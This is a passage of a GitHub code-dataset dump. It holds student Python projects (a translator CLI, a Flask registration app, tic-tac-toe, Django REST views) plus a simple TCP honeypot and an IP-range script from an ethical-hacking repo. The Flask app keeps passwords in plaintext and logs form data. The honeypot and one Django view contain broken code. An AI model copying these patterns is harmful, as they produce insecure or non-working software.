help='To Language')\nparser.add_argument('-f', '--from_lang', metavar='From Language', action='store', default = 'auto', help='From Language')\nparser.add_argument('-p', '--provider', metavar='PROVIDER', action='store', default = 'google', choices=['google', 'bing'])\nargs = parser.parse_args()\n\nif args.text == \"\":\n lines = []\n while True:\n try:\n line = input(\">>> \")\n lines.append(line + '\\n')\n except KeyboardInterrupt:\n break\n with open('example.txt','w') as f:\n f.writelines(lines)\n args.text = os.getcwd() + \"\\\\example.txt\"\n\ntrans = Translation(args.text)\nprint(trans.process(args.from_lang, args.to_lang, args.provider))\n"
},
{
"alpha_fraction": 0.6030927896499634,
"alphanum_fraction": 0.6030927896499634,
"avg_line_length": 20.086956024169922,
"blob_id": "f9d12b5c1999d7c31695becf316b5f304eecdebc",
"content_id": "0b966cffe540e71083249a2300e82da0508ddb38",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 970,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 46,
"path": "/register/app.py",
"repo_name": "rassool-ahad/maktab52-group2",
"src_encoding": "UTF-8",
"text": "from flask import Flask, render_template, request\n\n\nclass User:\n user_list = []\n\n def __init__(self, username, fname, lname, password):\n self.fname = fname\n self.lname = lname\n self.username = username\n self.password = password\n User.user_list.append(self)\n\n def info(self) -> str:\n return f\"id={User.user_list.index(self)}\\t{self.fname=}\\t{self.lname=}\\t{self.username=}\"\n\n\napp = Flask(__name__)\n\n\[email protected]('/', methods=['GET'])\ndef register():\n return render_template('register.html')\n\n\[email protected]('/', methods=['POST'])\ndef creat_user():\n form = request.form\n print(form)\n User(**form)\n return \"new user created\"\n\n\[email protected]('/<int:id>', methods=['GET'])\ndef show_user(id):\n u = User.user_list[id]\n return u.info()\n\n\[email protected]('/list', methods=['GET'])\ndef show_all_user():\n return render_template(\"show_all_users.html\", users=User.user_list)\n\n\nif __name__ == '__main__':\n app.run()\n"
},
{
"alpha_fraction": 0.5788352489471436,
"alphanum_fraction": 0.5960582494735718,
"avg_line_length": 41.992366790771484,
"blob_id": "3f72fad4477963ed0c1966f18d25fadf68f8041d",
"content_id": "ec1fca94abe235fde4e06004b2a3de02d159fd73",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5632,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 131,
"path": "/xo/xo.py",
"repo_name": "rassool-ahad/maktab52-group2",
"src_encoding": "UTF-8",
"text": "from typing import Literal, Union, List\n\n\nclass _Player:\n def __init__(self, name: str, sign: Union[str, Literal['x', 'o']]) -> None:\n self.name = name\n self.sign = sign\n\n\nclass _XOTable:\n\n def __init__(self):\n self.xo_map = {k: None for k in range(1, 10)} # {1:x, 2: None, 3: o, ...}\n\n def __str__(self):\n map = self.xo_map\n return \"\"\"\n -----------------\n| {} | {} | {} |\n -----------------\n| {} | {} | {} |\n -----------------\n| {} | {} | {} |\n -----------------\n\"\"\".format(*[map[i] if map[i] else i for i in map])\n\n def mark_update(self, cell_no, sign: str):\n assert isinstance(cell_no, int) and 1 <= cell_no <= 9, \"Enter a valid cell no [1, 9]\"\n assert not self.xo_map[cell_no], \"Cell is filled\"\n sign = str(sign).lower()\n assert sign in 'xo', 'Invalid sign' + sign\n self.xo_map[cell_no] = sign\n\n\nclass _XOGame(_XOTable):\n class UnFinishedGameError(Exception):\n \"winner: zamani raise mishe k, bazi tamoom nashode bahe, vali winner() ...\"\n pass\n\n class FinishedGameError(Exception):\n \"mark: dar zamin k bazi tamoom shde ...\"\n pass\n\n class InvalidCellError(Exception):\n \"mark: Che por bashe, che addesh eshtabah bashe va ...\"\n pass\n\n class InvalidPlayer(Exception):\n \"mark: palyere voroodi eshtebah bashad!!!\"\n pass\n\n def __init__(self, player1: _Player, player2: _Player) -> None:\n super().__init__()\n self.player1, self.player2, self.table = player1, player2, _XOTable()\n\n def _calculate_result(self) -> str:\n win_list = [\"123\", \"456\", \"789\", \"147\", \"258\", \"369\", \"159\", \"357\"]\n for item in win_list:\n value_list = [self.table.xo_map[int(index)] for index in item if self.table.xo_map[int(index)]]\n if \"\".join(value_list) == \"xxx\" or \"\".join(value_list) == \"ooo\":\n return \"\".join(value_list)[0] # change true and false to player sign\n return \"\" # bool(empty str) == False\n\n def mark(self, cell_no, player: Union[_Player, Literal['x', 'o'], int]):\n if not 1 <= cell_no <= 9: # condition is reversed!\n raise self.InvalidCellError(cell_no, \"cell number is invalid\")\n if player == \"x\" or player == \"o\" or player == \"X\" or player == \"O\":\n player = self.player1 if self.player1.sign == player.lower() else self.player2 # lower sign player\n elif player == '1' or player == '2': # number 1 & 2 must be string because may be xo\n player = self.player1 if player == '1' else self.player2\n elif player == self.player1.name or player == self.player2.name: # get player with name\n player = self.player1 if player == self.player1.name else self.player2\n else:\n raise self.InvalidPlayer(player, \"invalid player\")\n self.table.mark_update(cell_no, player.sign) # table is self attribute so table change to self.table\n print(self.table)\n\n def winner(self):\n res = self._calculate_result() # res = 'x' or res = 'o' or res = ''\n # if not res and None in self.table.xo_map.values(): # check winner before end game round raise Exception\n # raise self.UnFinishedGameError(\"The Game has not Finished yet!...\")\n if res: # if res != ''\n return self.player1 if res == self.player1.sign else self.player2 # find winner player sign\n elif not res and None not in self.table.xo_map.values():\n return None\n return False\n\n\nplayer1_name = input(\"Please Enter Your Name:\")\nplayer1_sign = input(\"Please Enter Your Sign:\").lower()\nplayer1 = _Player(player1_name, player1_sign)\nplayer2_name = input(\"Please Enter Your Name:\")\nplayer2_sign = 'o' if player1_sign == 'x' else 'x' # auto sign for player2\nplayer2 = 
_Player(player2_name, player2_sign) # player1_name to player2_name\n\nwinner_dict = {player1: 0, player2: 0}\ngame: List[any] = [None for i in range(3)]\nfor game_round in range(3):\n game[game_round], winner = _XOGame(player1, player2), False # winner before loop must defined\n turn_player = player1 if not game_round % 2 else player2 # Change First Player Every Round\n while winner is False: # winner is None and not equal players\n turn = input(f\"Please Enter A Cell Number and Your Mark(Or Just Cell Number for {turn_player.name} turn):\")\n try: # get cell number and player\n num, sign = turn.split(\" \")\n except: # get just cell number for suggested player\n num = turn\n sign = turn_player.sign\n try: # handling exceptions in mark method\n game[game_round].mark(int(num), sign) # cell_no must be integer not string\n turn_player = player1 if turn_player == player2 else player2 # change turn if current turn\n except:\n print('\\nTry Again...!\\n')\n\n try: # winner = player1 or player2\n winner = game[game_round].winner()\n except:\n pass # handling UnFinishedGameError and winner is None yet\n\n if isinstance(winner, _Player):\n winner_dict[winner] += 1\n print(f\"\\n{game_round + 1}th Round finished. This Round Winner Is {winner.name}\\n\")\n\n if winner is None:\n print(f\"\\n{game_round + 1}th Round finished. This Round Is A Tie\\n\")\n\nwinner_dict_values = list(winner_dict.values())\nif winner_dict_values[0] != winner_dict_values[1]:\n winner_dict_reverse = {v: k for k, v in winner_dict.items()}\n print(f\"The Winner IS: {winner_dict_reverse[sorted(winner_dict_reverse.keys())[1]].name}\") # print player.name\nelse:\n print(\"This Game Is A Tie\")\n"
},
{
"alpha_fraction": 0.542559027671814,
"alphanum_fraction": 0.5453047752380371,
"avg_line_length": 36.14285659790039,
"blob_id": "bf5258676623918181aed8ab1097bc65c12ac38f",
"content_id": "3cbbd99e826715c5f92fb80a6a2592b88b94dc38",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1821,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 49,
"path": "/Translators/models/exceptions.py",
"repo_name": "rassool-ahad/maktab52-group2",
"src_encoding": "UTF-8",
"text": "\nimport logging, translators as ts\n\nlogging.basicConfig(level = logging.INFO, format = '%(asctime)s - %(levelname)-10s - %(message)s')\n\nclass Translation:\n def __new__(cls, file_path: str):\n try:\n open(file_path)\n except FileNotFoundError:\n logging.error('No File Match Search...')\n except:\n logging.error('Invalid Path!!')\n else:\n return super().__new__(cls)\n\n def __init__(self, file_path: str):\n self.path = file_path\n with open(self.path, encoding = 'utf-8') as fl:\n self.text = fl.readlines()\n logging.info('Successfully Read File.')\n\n def process(self, from_lang = 'auto', target_language = 'fa', pro = 'google'):\n self.translated = []\n try:\n for line in self.text:\n self.translated.append(getattr(ts, pro)(line, from_language = 'auto', to_language = target_language))\n except: logging.error('Invalid Language! Pay Attention to Language in the Google Translate...')\n print(*self.translated, sep = '\\n')\n return self.translated\n\n def save_file(self, file_name: str):\n try:\n fl = open('\\\\'.join(self.path.split('\\\\')[: -1]) + '\\\\' + file_name, 'x', encoding = 'utf-8')\n except FileExistsError:\n logging.warning('File has Existed...')\n except:\n logging.error('File Name Must be is a String.')\n else:\n try:\n translate = self.translated\n except AttributeError:\n translate = self.process()\n finally:\n with fl:\n print(*translate, sep = '\\n', file = fl)\n logging.info('Saved Content into the File!')\n\n def __repr__(self):\n return f\"File at {self.path} Location.\"\n"
},
{
"alpha_fraction": 0.5586914420127869,
"alphanum_fraction": 0.5695958733558655,
"avg_line_length": 38.97435760498047,
"blob_id": "08bdd50b0482743017b1a1c81b5a0898ffe8b71c",
"content_id": "657ef6d08be9b69f02ec8f8e3581db5aeae0b426",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1559,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 39,
"path": "/CountDown.py",
"repo_name": "rassool-ahad/maktab52-group2",
"src_encoding": "UTF-8",
"text": "#Rasool Ahadi - Reza Gholami - Sepehr Bazyar\nimport datetime, time, argparse\n\nparser = argparse.ArgumentParser(description = \"It's Countdown App\")\nparser.add_argument(\"time\", type = str, action = \"store\", default = None , nargs = \"?\")\nparser.add_argument(\"-ss\", \"--sec\", type = int, action = \"store\", metavar = \"SECONDS\", default = 0)\nparser.add_argument(\"-mm\", \"--min\", type = int, action = \"store\", metavar = \"MINUTE\", default = 0)\nparser.add_argument(\"-hh\", \"--hour\", type = int, action = \"store\", metavar = \"HOUR\", default = 0)\nargs = parser.parse_args()\n\nif args.time:\n date = str(datetime.datetime.now().date())\n countdown_start = datetime.datetime.fromisoformat(date + \" \"+ args.time) - datetime.datetime.now()\n while True:\n try:\n print(countdown_start)\n time.sleep(1)\n countdown_start -= datetime.timedelta(seconds = 1)\n if countdown_start.total_seconds() < 1:\n print(\"Timeps UP!!\")\n break\n except KeyboardInterrupt:\n print(\"Fineshed!!\")\n break\n\nelse:\n date = str(datetime.datetime.now().date())\n ti = datetime.datetime.fromisoformat(date +f\" {args.hour:02}:{args.min:02}:{args.sec:02}\")\n while True:\n try:\n print(ti)\n ti -= datetime.timedelta(seconds = 1)\n time.sleep(1)\n if ti.time().second == 0 and ti.time().minute == 0 and ti.time().hour == 0:\n print(\"Times UP!!\")\n break\n except KeyboardInterrupt:\n print(\"Fineshed!!\")\n break\n"
}
] | 5 |
EunkyoungJung/practice_drf | https://github.com/EunkyoungJung/practice_drf | 182a5a20865b577ff40e1a0cea2e1158843cd455 | 47d7a7f2d823a1d87733278ff83d03f88169c832 | 96ab2a0efb15a24c4abb264f704f7ebdc83705f7 | refs/heads/master | 2021-05-20T08:16:19.828970 | 2020-04-02T04:18:48 | 2020-04-02T04:18:48 | 252,189,655 | 0 | 0 | null | 2020-04-01T13:55:15 | 2020-04-02T02:22:51 | 2020-04-02T04:18:49 | Python | [
{
"alpha_fraction": 0.7821782231330872,
"alphanum_fraction": 0.7821782231330872,
"avg_line_length": 19.200000762939453,
"blob_id": "d265ec70f6eadb31df30eb745888de70e15147a3",
"content_id": "efb3c607066a02ad5eda4ec7f6d81dfc2de13934",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 101,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 5,
"path": "/flighttracker/apps.py",
"repo_name": "EunkyoungJung/practice_drf",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\n\n\nclass FlighttrackerConfig(AppConfig):\n name = 'flighttracker'\n"
},
{
"alpha_fraction": 0.688622772693634,
"alphanum_fraction": 0.7045907974243164,
"avg_line_length": 34.71428680419922,
"blob_id": "787d57c56eedc0c632f382e0d0ca67ed8654c22d",
"content_id": "afb2d24f6b1ab40478bafb089bc9d34431134f93",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 501,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 14,
"path": "/order/models.py",
"repo_name": "EunkyoungJung/practice_drf",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nclass Customer(models.Model):\n firstName = models.CharField(max_length=20)\n lastName = models.CharField(max_length=20)\n phone_number = models.CharField(max_length=20)\n\n def __str__(self):\n return self.firstName + \" \" + self.lastName\n\nclass Order(models.Model):\n product = models.CharField(max_length=20)\n quantity = models.SmallIntegerField()\n customer = models.ForeignKey(Customer, related_name=\"customers\", on_delete=models.CASCADE)\n\n"
},
{
"alpha_fraction": 0.7166064977645874,
"alphanum_fraction": 0.7193140983581543,
"avg_line_length": 30.514286041259766,
"blob_id": "ba05a04fddd79c70a655b70484bc0a6b379189dc",
"content_id": "13216c32cd399fbf3b1d4a460f7cb262cce31001",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1108,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 35,
"path": "/course/views.py",
"repo_name": "EunkyoungJung/practice_drf",
"src_encoding": "UTF-8",
"text": "#from django.http import Http404\n\n#from rest_framework import status\n#from rest_framework.response import Response\n#from rest_framework.views import APIView\nfrom rest_framework import generics, mixins\n\nfrom new_course.models import Course\nfrom new_course.serializers import CourseSerializer\n\nclass CourseList(mixins.ListModelMixin, mixins.CreateModelMixin, generics.GenericAPIView):\n queryset = Course.objects.all()\n serializer_class = CourseSerializer\n\n def get(self, request):\n return self.list(request)\n\n def post(self, request):\n return self.create(request)\n\nclass CourseDetail(mixins.RetrieveModelMixin, mixins.UpdateModelMixin, mixins.DestroyModelMixin, generics.GenericAPIView):\n queryset = Course.objects.all()\n serializer_class = CourseSerializer\n\n def get(self, pk):\n return self.retrieve(request,pk)\n\n def put(self, request, pk):\n return self.retrieve(request, pk)\n\n def put(self, request, pk):\n return self.update(request, pk)\n\n def delete(self, request, pk):\n return self.destroy(request, pk)\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.7699999809265137,
"alphanum_fraction": 0.7699999809265137,
"avg_line_length": 19,
"blob_id": "15704645b81651ec3938ce61e091a24a369ee267",
"content_id": "840800f1bfaee576e7103180704d3c918861755c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 100,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 5,
"path": "/newest_course/apps.py",
"repo_name": "EunkyoungJung/practice_drf",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\n\n\nclass NewestCourseConfig(AppConfig):\n name = 'newest_course'\n"
},
{
"alpha_fraction": 0.775086522102356,
"alphanum_fraction": 0.7802768349647522,
"avg_line_length": 33,
"blob_id": "6be0ddb004e516541566d55cb35824b7b32bf617",
"content_id": "f77550a54d11fef1fc63d0a2ed3eb08596088441",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 578,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 17,
"path": "/newer_course/views.py",
"repo_name": "EunkyoungJung/practice_drf",
"src_encoding": "UTF-8",
"text": "#from django.http import Http404\n\n#from rest_framework import status\nfrom rest_framework.response import Response\n#from rest_framework.views import APIView\nfrom rest_framework import generics, mixins\n\nfrom newer_course.models import Course\nfrom newer_course.serializers import CourseSerializer\n\nclass CourseList(generics.ListCreateAPIView):\n queryset = Course.objects.all()\n serializer_class = CourseSerializer\n\nclass CourseDetail(generics.RetrieveUpdateDestroyAPIView):\n queryset = Course.objects.all()\n serializer_class = CourseSerializer\n"
},
{
"alpha_fraction": 0.7961538434028625,
"alphanum_fraction": 0.7961538434028625,
"avg_line_length": 31.25,
"blob_id": "2239ee0437a7f14862c256b460049e561c6ad520",
"content_id": "76bb56f92586a49a679bdf7a425d6de7f1d7e784",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 260,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 8,
"path": "/newest_course/views.py",
"repo_name": "EunkyoungJung/practice_drf",
"src_encoding": "UTF-8",
"text": "from rest_framework import viewsets\n\nfrom newest_course.models import Course\nfrom newest_course.serializers import CourseSerializer\n\nclass CourseViewSet(viewsets.ModelViewSet):\n queryset = Course.objects.all()\n serializer_class = CourseSerializer\n\n\n"
},
{
"alpha_fraction": 0.7058823704719543,
"alphanum_fraction": 0.7058823704719543,
"avg_line_length": 27.538461685180664,
"blob_id": "3f03c68402515d3c0fd869807a4cf28520bc4e32",
"content_id": "06d0e09f8111ce5d6af5706a88b95ee1d75f372c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 374,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 13,
"path": "/order/serializers.py",
"repo_name": "EunkyoungJung/practice_drf",
"src_encoding": "UTF-8",
"text": "from .models import Customer, Order\nfrom rest_framework import serializers\n\nclass CustomerSerializer(serializers.ModelSerializer):\n class Meta:\n model=Customer\n fields='__all__'\n\nclass OrderSerializer(serializers.ModelSerializer):\n customers = CustomerSerializer(read_only=True, many=True)\n class Meta:\n model=Order\n fields='__all__'\n\n\n\n"
},
{
"alpha_fraction": 0.7553191781044006,
"alphanum_fraction": 0.7553191781044006,
"avg_line_length": 17.799999237060547,
"blob_id": "b41daefdcbaae575dead88280a3bcd098eaa97b3",
"content_id": "bdcb54b4e74ee382a39c9292f7e5381f950d759a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 94,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 5,
"path": "/new_course/apps.py",
"repo_name": "EunkyoungJung/practice_drf",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\n\n\nclass NewCourseConfig(AppConfig):\n name = 'new_course'\n"
},
{
"alpha_fraction": 0.6428571343421936,
"alphanum_fraction": 0.6642857193946838,
"avg_line_length": 41,
"blob_id": "a21a3a1a45a1fc7bac8d22cd0eba28d4666477b5",
"content_id": "24c15e86aafa41b7c66d08d253c3a27239cb7ef4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 420,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 10,
"path": "/newer_course/models.py",
"repo_name": "EunkyoungJung/practice_drf",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nclass Course(models.Model):\n id = models.IntegerField(primary_key=True)\n name = models.CharField(max_length=100, blank=True, null=True)\n description = models.CharField(max_length=300, blank=True, null=True)\n rating = models.DecimalField(max_digits=10, decimal_places=2, blank=True, null=True)\n\n def __str__(self):\n return self.id + \"\" + self.name\n"
},
{
"alpha_fraction": 0.6570796370506287,
"alphanum_fraction": 0.6681416034698486,
"avg_line_length": 44.099998474121094,
"blob_id": "33efb37ee076a0c11b4dc9ce31417e41fa52c94f",
"content_id": "02cc9b90a54daf1b5b4b5ac17da7019e1026f5d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 452,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 10,
"path": "/flighttracker/models.py",
"repo_name": "EunkyoungJung/practice_drf",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nclass Passenger(models.Model):\n id = models.IntegerField(primary_key=True)\n first_name = models.CharField(max_length=25, blank=False, null=False, default='')\n last_name = models.CharField(max_length=25, blank=False, null=False, default='')\n flight_points = models.IntegerField(blank=False, null=False, default=0)\n\n def __str__(self):\n return self.first_name + \" \" + self.last_name\n\n"
},
{
"alpha_fraction": 0.7222222089767456,
"alphanum_fraction": 0.7222222089767456,
"avg_line_length": 30.375,
"blob_id": "f6ba4a5a7a116a81c4d6811f3012a0c556c57d52",
"content_id": "734f3f0f01a8b53392c3106dc6220e245b0f396c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 252,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 8,
"path": "/flighttracker/serializers.py",
"repo_name": "EunkyoungJung/practice_drf",
"src_encoding": "UTF-8",
"text": "from rest_framework import serializers\n\nfrom flighttracker.models import Passenger\n\nclass PassengerSerializer(serializers.ModelSerializer):\n class Meta:\n model = Passenger\n fields = ['id', 'first_name', 'last_name', 'flight_points']\n\n"
},
{
"alpha_fraction": 0.5510563254356384,
"alphanum_fraction": 0.5713028311729431,
"avg_line_length": 33.42424392700195,
"blob_id": "f1f5226d857d5c889b79610a02523e55ce769f99",
"content_id": "d702e74ddb9b02c1727458548a40e5a8df8e7727",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1136,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 33,
"path": "/order/migrations/0001_initial.py",
"repo_name": "EunkyoungJung/practice_drf",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.5 on 2020-04-02 04:06\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Customer',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('firstName', models.CharField(max_length=20)),\n ('lastName', models.CharField(max_length=20)),\n ('phone_number', models.CharField(max_length=20)),\n ],\n ),\n migrations.CreateModel(\n name='Order',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('product', models.CharField(max_length=20)),\n ('quantity', models.SmallIntegerField()),\n ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='customers', to='order.Customer')),\n ],\n ),\n ]\n"
},
{
"alpha_fraction": 0.8017751574516296,
"alphanum_fraction": 0.8017751574516296,
"avg_line_length": 32.70000076293945,
"blob_id": "0820da93e084529dd8b3b9ac728f6e7adf4eda9a",
"content_id": "dd8cb19cb47e6bb88f847b9a0e48bcf7b6491070",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 676,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 20,
"path": "/order/views.py",
"repo_name": "EunkyoungJung/practice_drf",
"src_encoding": "UTF-8",
"text": "from rest_framework import generics\n\nfrom .serializers import CustomerSerializer, OrderSerializer\nfrom .models import Customer, Order\n\nclass CustomerListView(generics.ListCreateAPIView):\n queryset = Customer.objects.all()\n serializer_class = CustomerSerializer\n\nclass CustomerDetailView(generics.RetrieveUpdateDestroyAPIView):\n queryset = Customer.objects.all()\n serializer_class = CustomerSerializer\n\nclass OrderListView(generics.ListCreateAPIView):\n queryset = Order.objects.all()\n serializer_class = OrderSerializer\n\nclass OrderDetailView(generics.RetrieveUpdateDestroyAPIView):\n queryset = Order.objects.all()\n serializer_class = OrderSerializer\n\n\n"
}
] | 13 |
mikrogravitation/kommandozentrale | https://github.com/mikrogravitation/kommandozentrale | 266661562a055a442ad149a7abddd7b6c48f6fd6 | 762e28f24d89cd39f0ff5a23dc77d0b123cd32b9 | 27550d935882c26ff95a7d5de8e8a26cac30993f | refs/heads/master | 2021-07-01T19:15:46.987964 | 2017-09-20T20:32:24 | 2017-09-20T20:32:24 | 103,864,045 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.624438464641571,
"alphanum_fraction": 0.6379155516624451,
"avg_line_length": 36.099998474121094,
"blob_id": "7f9a2f0cf7e2aa4c5fe7603042091f16eeaa3ac3",
"content_id": "527723ec901d1f164467e33d59760ab28da2ca74",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1113,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 30,
"path": "/mosquitto/mockup.py",
"repo_name": "mikrogravitation/kommandozentrale",
"src_encoding": "UTF-8",
"text": "import paho.mqtt.client as mqtt\nimport json, struct, random\n\n# Load configuarion\nwith open(\"../web/config.json\") as cfile:\n config = json.load(cfile)\n\n# Called when client is connecteed\ndef on_connect(client, userdata, flags, rc):\n # Go through all rooms\n for room in config[\"rooms\"]:\n # Go through all items\n for item in room[\"items\"]:\n # If item is a light, set on/off randomly\n if item[\"mqtt_id\"].startswith(\"light/\"):\n d = struct.pack('b',random.randint(0,1))\n client.publish(item[\"mqtt_id\"], d, retain=True, qos=1)\n # It item is a music player, set example-values\n elif item[\"mqtt_id\"].startswith(\"mpd/\"):\n client.publish(item[\"mqtt_id\"], '{\"current_song\":\"Test Song\", \"playlist_name\":\"Test Playlist\"}', retain=True, qos=1)\n # Disconnect from client, ending script\n client.disconnect()\n\n# Create client\nclient = mqtt.Client(transport=\"websockets\")\nclient.on_connect = on_connect\n# connect to broker\nclient.connect(\"127.0.0.1\", 9000, 5)\n# wait until client disconnects\nclient.loop_forever()\n"
}
] | 1 |
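mockup.py publishes retained light and MPD states over MQTT-over-websockets; a minimal companion subscriber (assumed, not part of the repo) that prints those retained messages back out:

```python
# Sketch: connect to the same local broker and dump whatever mockup.py retained.
import paho.mqtt.client as mqtt

def on_connect(client, userdata, flags, rc):
    client.subscribe("#")  # all topics; narrow to "light/#" or "mpd/#" if preferred

def on_message(client, userdata, msg):
    print(msg.topic, msg.payload)

client = mqtt.Client(transport="websockets")
client.on_connect = on_connect
client.on_message = on_message
client.connect("127.0.0.1", 9000, 5)
client.loop_forever()
```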
MKedas/EH496 | https://github.com/MKedas/EH496 | 5f9b20bb2c57485f72abcab2fb70c4bcc13f1a9b | d961a1f3e980e41f6194044bafe83f820c3f5b7c | 96c1afc48bb3037bdce584ea8b4434e8cf5ba3b0 | refs/heads/master | 2021-01-10T17:00:34.794788 | 2015-05-22T18:32:14 | 2015-05-22T18:32:14 | 36,088,837 | 0 | 1 | null | 2015-05-22T18:32:38 | 2015-05-22T18:32:42 | 2015-05-22T18:32:42 | Python | [
{
"alpha_fraction": 0.6373626589775085,
"alphanum_fraction": 0.6465201377868652,
"avg_line_length": 21.75,
"blob_id": "723aa3251be7911df5f357ff2e5b95980f7970dc",
"content_id": "6f230cf56a85f6495aa3f0a0652d0dddd4023f10",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 546,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 24,
"path": "/honeypot.py",
"repo_name": "MKedas/EH496",
"src_encoding": "UTF-8",
"text": "import socket\nimport sys\nfrom time import gmtime, strftime\n\ntimestamp = datetime.now()\n\ndef main():\n\n\tsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n #Arguement 1 = IP Address of Host\n #Arguement 2 = Port number\n \tsock.bind((sys.argv[1],int(sys.argv[2])))\n \t#Up to five people can connect\n sock.listen(5)\n\twhile True:\n\t\tc,addr = s.accept()\n\t\tc.send(\"Opps.\")\n print \"Time of Incident :\", timestamp\n\t\tprint \"%s on port %i has connected.\" % (addr)\n\t\tsys.stdout.write(\"\\a\")\n\t\tsys.stdout.flush()\n\t\tc.close()\n\nmain()\n"
},
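Any TCP client can trigger the honeypot above; a quick manual probe (host and port are examples matching whatever was passed on the command line):

```python
# Sketch: connect once; the honeypot should print the incident time and our address.
import socket

with socket.create_connection(("127.0.0.1", 2222)) as s:  # example host/port
    print(s.recv(1024))
```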
{
"alpha_fraction": 0.4771480858325958,
"alphanum_fraction": 0.47806215286254883,
"avg_line_length": 44.58333206176758,
"blob_id": "9eb7de2163c9c65e015ac6990d11cccbfdc5f152",
"content_id": "73165ba05df1158451c5835738fa2f8a2b0bfa86",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1094,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 24,
"path": "/ipRange.py",
"repo_name": "MKedas/EH496",
"src_encoding": "UTF-8",
"text": "#Simple ip range script that outputs all\n#possible host IP addresses into an array\n\ndef iprange(network, starthostip, stophostip):\n tempiplist = []\n for i in range (starthostip,stophostip+1):\n tempiplist.append(\"%s.%i\" % (network , i))\n return tempiplist\n\ndef main():\n iplist = []\n network = raw_input('Enter your network prefix: ')\n starthostip = int(raw_input('Start range from address %s.' % network))\n stophostip = int(raw_input('Ending range at address %s.' % network))\n print \"*******************************************************\"\n print \"* Your network is %s *\" % network\n print \"*_____________________________________________________*\"\n print \"* Your starting IP %s.%i *\" % (network,starthostip)\n print \"*_____________________________________________________*\"\n print \"* Your ending IP will be %s.%i *\" % (network,stophostip)\n print \"*******************************************************\"\n iplist = iprange(network, starthostip, stophostip)\n print iplist\nmain()\n"
},
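For reference, the nested input/loop logic of iprange() above reduces to a single list comprehension; with example inputs:

```python
# "192.168.1" and 1..254 are example inputs, not values from the script.
iplist = ["192.168.1.%i" % i for i in range(1, 255)]
```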
{
"alpha_fraction": 0.5242140889167786,
"alphanum_fraction": 0.5310110449790955,
"avg_line_length": 23.52083396911621,
"blob_id": "5bb72c9f732099593d0b8b90b53200d2e5f711c6",
"content_id": "910e8cd0a2ce8fe192c02038dd161dd623b6136b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1177,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 48,
"path": "/portscanner.py",
"repo_name": "MKedas/EH496",
"src_encoding": "UTF-8",
